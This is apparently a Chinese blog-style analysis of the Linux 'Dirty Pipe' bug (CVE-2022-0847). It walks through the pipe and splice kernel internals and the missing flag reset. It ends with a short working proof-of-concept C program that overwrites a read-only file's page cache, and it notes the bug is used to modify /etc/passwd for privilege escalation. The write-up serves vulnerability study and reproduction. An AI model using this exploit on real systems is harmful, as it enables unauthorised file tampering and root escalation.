CVE-2022-0847

简介

本质上，这个漏洞是由内存未初始化造成的，一般此漏洞用于提权，可以修改/etc/passwd文件来达到任意写文件。

受害版本内核为大于等于5.8，小于5.16.11, 5.15.25 and 5.10.102。

fork

一个进程，包括代码、数据和分配给进程的资源。fork可以克隆一个进程。

会返回一个PID，0的话表示子进程，1表示父进程。

pipe

管道通信

# include <unistd.h>
int pipe(int pipefd[2]);
/*pipe（）创建一个管道，一个可以用于进程间通信。数组pipefd用于返回两个引用管道末端的文件描述符。
pipefd[0]是指管道的读取端。pipefd[1]指到管道的写入端。写入的写入端的数据管道由内核缓冲，直到从读取中读取为止管道末端。有关更多详细信息。*/
int pipe2(int pipefd[2], int flags);	/*如果flags为0，则pipe2（）与pipe（）相同。*/
// 成功后，返回零。出现错误时，返回-1，errno为设置为指示错误，并且pipefd保持不变。

样例

以下程序创建一个管道，然后forks创建子进程，子级进程继承了一组重复的文件描述符，这些描述符引用同一管道。

在fork之后，每个进程都会关闭管道不需要的文件描述符。然后，父级写入包含的字符串在程序的命令行参数中从管道中一次读取此字符串一个字节，并在上进行回显标准输出。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
   int    pipefd[2];
   char   buf;
   pid_t  cpid;
   if (argc != 2) {
       fprintf(stderr, "Usage: %s <string>\n", argv[0]);
       exit(EXIT_FAILURE);
   }
   if (pipe(pipefd) == -1) {
       perror("pipe");
       exit(EXIT_FAILURE);
   }
   cpid = fork();
   if (cpid == -1) {
       perror("fork");
       exit(EXIT_FAILURE);
   }
   if (cpid == 0) {    /* 子进程进行读取 */
       close(pipefd[1]);          /* 关闭父进程写入 */
       while (read(pipefd[0], &buf, 1) > 0)    write(STDOUT_FILENO, &buf, 1);
       write(STDOUT_FILENO, "\n", 1);
       close(pipefd[0]);	/*写入完毕*/
       _exit(EXIT_SUCCESS);	/*退出执行*/
   } else {            /* 父进程进行写入 */
       close(pipefd[0]);          /* 关闭子进程读取 */
       write(pipefd[1], argv[1], strlen(argv[1]));
       close(pipefd[1]);          /* 写入完毕 */
       wait(NULL);                /* 等待子进程 */
       exit(EXIT_SUCCESS);
   }
}

主要结构体

struct pipe_inode_info {
...
	unsigned int head;	// 指向队头
	unsigned int tail;	// 指向队尾
	unsigned int max_usage;	// 表示最大的buffer数量
	unsigned int ring_size;
...
	struct page *tmp_page;	// 其中这里的page并不直接指向目标页，而是一个物理页的页框
...
	struct pipe_buffer *bufs;
...
};

pipe在内核中使用了环状buffer（bufs字段），而默认的数量为16个（PIPE_DEF_BUFFERS），每一个struct pipe_buffer管理一个buffer，而一个buffer为一页的大小（默认0x1000）。pipe为FIFO的结构体，这可以从head和tail两个字段体现出来，head指向最新生产的buffer，而tail指向开始消费的buffer。

struct pipe_buffer {
	struct page *page;	// 这里的page也指向物理页框
	unsigned int offset,len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

PIP使用

static ssize_t 
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
    // 拿到pipe结构体
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
    // total_len为此次写入的长度
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;
---------------------------------------
	head = pipe->head;
	was_empty = true;
    
    /*可以看到，在pipe_write中使用了merge的思想，如果我们分16次向pipe中写入1字节，这16字节不会并不会分别占用16个pipe_buffer，而是连续占用第一个pipe_buffer。这很好理解，不然pipe就堵死了，那利用率就太低了。而负责管理merge的是struct pipe_buffer中的flags字段PIPE_BUF_FLAG_CAN_MERGE*/
    // 考虑使用merge，求出余数
	chars = total_len & (PAGE_SIZE-1);
	// 如果len&0xFFF !=0 且当前使用的页
	if (chars && !pipe_empty(head, pipe->tail)) {
	unsigned int mask = pipe->ring_size - 1;
    // 取head上一页的信息
	struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    // 获取本页中结尾偏移
	int offset = buf->offset + buf->len;
	if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && // 可以merge
		offset + chars <= PAGE_SIZE) { // 小于一页
			ret = pipe_buf_confirm(pipe, buf);	// 确认是否可以插入
        	// 拷贝内容，copy_page_from_iter(要写入数据的目标页面,写入数据的偏移量,要写入的字节数,数据源)
			ret = copy_page_from_iter(buf->page, offset, chars, from);
		}
	}
    
    // merge失败，或者merge不完全，接着处理剩下的内容
	for (;;) {
		head = pipe->head;
    	// 如果pipe没满
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
 				unsigned int mask = pipe->ring_size - 1;
    			// 取当前的pipe buffer
				struct pipe_buffer *buf = &pipe->bufs[head & mask];
				struct page *page = pipe->tmp_page;
				int copied;
				// 如果当前page是空的，就创建新的page，这个tmp_page是用来做缓存页的
				if (!page) {
						page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
		 				pipe->tmp_page = page;
	 			}
				// head++
	 			pipe->head = head + 1;
				spin_unlock_irq(&pipe->rd_wait.lock);	// 进行上锁
				// 开始初始化 pipe_buffer 的各个字段，因为新创了一个新的pipe_buffer
				buf = &pipe->bufs[head & mask];
				buf->page = page;
				buf->ops = &anon_pipe_buf_ops;
				buf->offset = 0;
				buf->len = 0;
				if (is_packetized(filp)) // 一般不走
					buf->flags = PIPE_BUF_FLAG_PACKET;
				else
				// 设置flag PIPE_BUF_FLAG_CAN_MERGE
					buf->flags = PIPE_BUF_FLAG_CAN_MERGE; 
				pipe->tmp_page = NULL;
                // 复制内容
				copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
				ret += copied;
            	buf->offset = 0;
				buf->len = copied;

相对应的，pipe_read也是通过pipe_inode_info拿到pipe_buffer进行读取，这里就不在分析。需要注意的是，pipe_buffer在read过程中只会被修改其offset和len字段，并不会被释放或是修改其flags字段，也就是说PIPE_BUF_FLAG_CAN_MERGE一但设置，则在read/write的过程中就不会再被清除掉。

splice

基本属性

splice()本质上是为了解决文件对拷的效率问题，它实现了“零拷贝”。splice()在两个文件描述符之间移动数据，而不在内核地址空间和用户地址空间之间进行复制。它将多达len字节的数据从文件描述符fd_in传输到文件描述符fd_out，其中一个文件描述符必须引用管道。

使用splice函数时，fd_in和fd_out必须至少有一个是管道文件描述符(局限)。splice函数调用成功时返回移动字节的数量。它可能返回0，表示没有数据需要移动，这发生在从管道中读取数据（fd_in是管道文件描述符）而该管道没有被写入任何数据时。

#include <fcntl.h>
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
/*
fd_in：源文件描述符，数据将从这个文件描述符中读取。
off_in：源文件的偏移量指针，在 fd_in 中的读取位置。可传入 NULL，表示使用当前位置。
fd_out：目标文件描述符，数据将写入到这个文件描述符中。
off_out：目标文件的偏移量指针，在 fd_out 中的写入位置。可传入 NULL，表示使用当前位置。
len：要传输的数据长度。
flags：传输标志位，可选参数，一般为 0。
*/

splice发送信息

/**
 * 发送文件给客户端（splice版本）
 */
int send_file_to_client(int client_fd, char *file)
{
    int fd;
    struct stat fstat;
    int blocks, remain;
    int pipefd[2];

    fd = open(file, O_RDONLY);
    if (fd == -1) {
        return -1;
    }
    stat(file, &fstat);
    blocks = fstat.st_size / 4096;
    remain = fstat.st_size % 4096;
    pipe(pipefd);  // 创建管道作为中转
    
    for (i = 0; i < blocks; i++) {
        // 1. 将文件内容读取到管道
        splice(fd, NULL, pipefd[1], NULL, 4096, SPLICE_F_MOVE|SPLICE_F_MORE);
        // 2. 将管道的数据发送给客户端连接
        splice(pipefd[0], NULL, client_fd, NULL, 4096, SPLICE_F_MOVE|SPLICE_F_MORE);
    }
    if (remain > 0) {
        splice(fd, NULL, pipefd[1], NULL, remain, SPLICE_F_MOVE|SPLICE_F_MORE);
        splice(pipefd[0], NULL, client_fd, NULL, remain, SPLICE_F_MOVE|SPLICE_F_MORE);
    }
    return 0;
}

原理

SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
    int, fd_out, loff_t __user *, off_out, size_t, len, unsigned int, flags)
    // loff_t是long long类型的，可以看源码得
    {
    // splice是对__do_splice的简单包装
    error = __do_splice(in.file, off_in, out.file, off_out, len, flags);
    }
------------------------------------------------------------------------
// __do_splice 是对 do_splice 的简单包装
    long do_splice(struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int flags)
    {
        struct pipe_inode_info *ipipe;
        struct pipe_inode_info *opipe;

    	// 从 in/out 中尝试取得 pipe_inode_info
		ipipe = get_pipe_info(in, true);
		opipe = get_pipe_info(out, true);
    	// 上面例子中in是普通文件，out是pipe，因此不进这里
		if (ipipe) {......}
    	// 进这里
		if (opipe) {
    		// 调用 do_splice_to
			ret = do_splice_to(in, &offset, opipe, len, flags);
		}
}
------------------------------------------------------------------------
	static long do_splice_to(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len,
		unsigned int flags)
	{
    	// 这里根据in的f_op->splice_read选择对应的函数
    	// 由于是普通文件，所以：
        // const struct file_operations generic_ro_fops = {
        //		.splice_read	= generic_file_splice_read,
        //};
		return in->f_op->splice_read(in, ppos, pipe, len, flags);
	}
------------------------------------------------------------------------
    // splice_read函数调用了generic_file_splice_read函数
	ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
			struct pipe_inode_info *pipe, size_t len, unsigned int flags)
	{
			struct iov_iter to;
			struct kiocb kiocb;
			unsigned int i_head;
			int ret;

    	// 这一段话一开始没读懂，查了源码应该应该是一个迭代器，iov_iter_pipe和init_sync_kiocb把信息封装到了to和kiocb里
    	// 这里的to本质是一个迭代去
		 	iov_iter_pipe(&to, READ, pipe, len);
		 	i_head = to.head;
		 	init_sync_kiocb(&kiocb, in);
			kiocb.ki_pos = *ppos;
    		// 进入这里，其实是调用in->f_op->read_iter(&kiocb,&to);
    		// 即 generic_file_read_iter()
		 	ret = call_read_iter(in, &kiocb, &to);
	}
------------------------------------------------------------------------
// 之后： 
// generic_file_read_iter()
// -> generic_file_buffered_read()
// -> copy_page_to_iter()
	size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
	{
		if (i->type & (ITER_BVEC|ITER_KVEC)) {
		} 
    	else if (unlikely(iov_iter_is_discard(i))) {
			} else if (likely(!iov_iter_is_pipe(i)))
			return copy_page_to_iter_iovec(page, offset, bytes, i);
	 	else
    	// 这里的i其实就是前面generic_file_splice_read中的to，因此是pipe
		return copy_page_to_iter_pipe(page, offset, bytes, i);
	}

漏洞

原理

延续上面的copy_page_to_iter_pipe函数，可以看到，最主要的逻辑就在copy_page_to_iter_pipe中，之所以splice实现了CPU的零拷贝是因为他直接对目标页的ref count进行了递增，然后把目标页的物理页页框复制到pipe buffer的page处，但这里却忘记设置pipe buffer的flags字段，可以利用此处的漏洞。

使用pipe read/write，我们可以让目标pipe的每个pipe buffer都带上PIPE_BUF_FLAG_CAN_MERGEflag。之后打开目标文件，并使用splice 写到之前处理过的pipe中，splice底层会帮助我们把目标文件的page cache 设置到pipe buffer的page字段，但却没有修改flags字段。之后我们再调用pipe write时由于存在PIPE_BUF_FLAG_CAN_MERGEflag字段，内容会接着上次被写入同一个page中，但page其实已经变成了目标文件的page cache，导致直接修改了目标文件page cache。如果之后有其他文件尝试读取这个文件，kernel会优先返回cache中的内容，也就是被我们修改后的page cache。

// 终于来到了我们今天的主角：copy_page_to_iter_pipe，page指向file，offset指向偏移，bytes指向多少字节，i为pipe迭代器
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    off = i->iov_offset;

    buf = &pipe->bufs[i_head & p_mask];
    if (off) {......}
    if (pipe_full(i_head, p_tail, pipe->max_usage))	return 0;

    // 划重点!!! 没有设置buf->flags
    buf->ops = &page_cache_pipe_buf_ops;

    // page ref_count ++
    get_page(page);
    // 直接把普通文件的pipe拿来放到pipe中
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

复现

首先先找一台符合要求的kernel系统，创建一个target文件，内容为11111111111111111111111111111，然后赋予它只读权限。使用EXP.c进行编译然后运行即可。

/*exp.c*/
#include<stdio.h>
#include<unistd.h>
#include<fcntl.h>
#include<malloc.h>
#include<errno.h>
int main()
{
        int fd[2];
        int ret=0;
        pipe(fd);
        unsigned long long offset;
        offset=2;
        void *p=malloc(0xaaaa);
        for(int i=0;i<16;i++)   write(fd[1],p,4096);
        for(int i=0;i<16;i++)   read(fd[0],p,4096);
        int target=open("./target",O_RDONLY);
        ret = splice(target,&offset,fd[1],NULL,1,0);
        write(fd[1],"PPP\0",4);
        return 0;
}